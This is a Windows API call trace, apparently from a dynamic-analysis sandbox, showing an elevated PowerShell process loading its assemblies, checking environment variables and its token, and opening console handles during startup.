	[0491.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0491.832] CoTaskMemAlloc (cb=0x104) returned 0x2c1bb0
	[0491.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1bb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.832] CoTaskMemFree (pv=0x2c1bb0) 
	[0491.835] CoTaskMemAlloc (cb=0x104) returned 0x2c1bb0
	[0491.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1bb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.836] CoTaskMemFree (pv=0x2c1bb0) 
	[0492.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0499.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0499.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0500.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0500.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0502.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0504.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0504.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0505.407] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0505.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.408] CoTaskMemFree (pv=0x2c1dd0) 
	[0505.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0505.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0505.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0505.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0506.685] SetErrorMode (uMode=0x1) returned 0x1
	[0506.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12d8e0 | out: lpFileInformation=0x12d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0506.685] SetErrorMode (uMode=0x1) returned 0x1
	[0510.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.101] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0510.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.101] CoTaskMemFree (pv=0x2c1dd0) 
	[0510.104] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0510.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.104] CoTaskMemFree (pv=0x2c1dd0) 
	[0510.105] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0510.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.105] CoTaskMemFree (pv=0x2c1dd0) 
	[0510.707] CoCreateGuid (in: pguid=0x12dca8 | out: pguid=0x12dca8*(Data1=0x5297c72f, Data2=0x3aed, Data3=0x44b0, Data4=([0]=0x8c, [1]=0x72, [2]=0x3c, [3]=0x3d, [4]=0x19, [5]=0x98, [6]=0xa9, [7]=0x8b))) returned 0x0
	[0510.710] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0510.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.710] CoTaskMemFree (pv=0x2c1dd0) 
	[0510.713] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0510.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.714] CoTaskMemFree (pv=0x2c1dd0) 
	[0510.716] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0510.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.716] CoTaskMemFree (pv=0x2c1dd0) 
	[0510.724] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0510.725] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12d950 | out: lpConsoleScreenBufferInfo=0x12d950) returned 1
	[0510.732] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0510.733] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12d950 | out: lpConsoleScreenBufferInfo=0x12d950) returned 1
	[0510.736] GetCurrentProcess () returned 0xffffffffffffffff
	[0510.736] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12d978 | out: TokenHandle=0x12d978*=0x320) returned 1
	[0510.739] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d898 | out: TokenInformation=0x0, ReturnLength=0x12d898) returned 0
	[0510.740] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c7310
	[0510.740] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2c7310, TokenInformationLength=0x4, ReturnLength=0x12d898 | out: TokenInformation=0x2c7310, ReturnLength=0x12d898) returned 1
	[0510.741] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12d9f8 | out: phNewToken=0x12d9f8*=0x31c) returned 1
	[0510.741] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d898 | out: TokenInformation=0x0, ReturnLength=0x12d898) returned 0
	[0510.741] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c7340
	[0510.741] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2c7340, TokenInformationLength=0x4, ReturnLength=0x12d898 | out: TokenInformation=0x2c7340, ReturnLength=0x12d898) returned 1
	[0510.742] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2e11d70*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12da08 | out: IsMember=0x12da08) returned 1
	[0510.743] CloseHandle (hObject=0x31c) returned 1
	[0510.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.287] CoTaskMemAlloc (cb=0x804) returned 0x1b832880
	[0511.287] GetConsoleTitleW (in: lpConsoleTitle=0x1b832880, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0511.287] CoTaskMemFree (pv=0x1b832880) 
	[0511.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0513.285] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.285] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.293] CoCreateGuid (in: pguid=0x12daf0 | out: pguid=0x12daf0*(Data1=0x8a94a0fb, Data2=0xebdf, Data3=0x4084, Data4=([0]=0x85, [1]=0x91, [2]=0xe6, [3]=0xfd, [4]=0xa5, [5]=0xd2, [6]=0x2f, [7]=0xbc))) returned 0x0
	[0513.293] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.294] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.299] WinSqmIsOptedIn () returned 0x0
	[0513.300] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.300] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.302] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.302] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.303] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.303] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.303] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.303] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.304] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.304] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.305] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.305] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.306] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.306] CoTaskMemFree (pv=0x2c1dd0) 
	[0513.306] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0513.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.306] CoTaskMemFree (pv=0x2c1dd0) 
	[0514.508] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0514.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.509] CoTaskMemFree (pv=0x2c1dd0) 
	[0514.513] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0514.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.513] CoTaskMemFree (pv=0x2c1dd0) 
	[0514.513] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
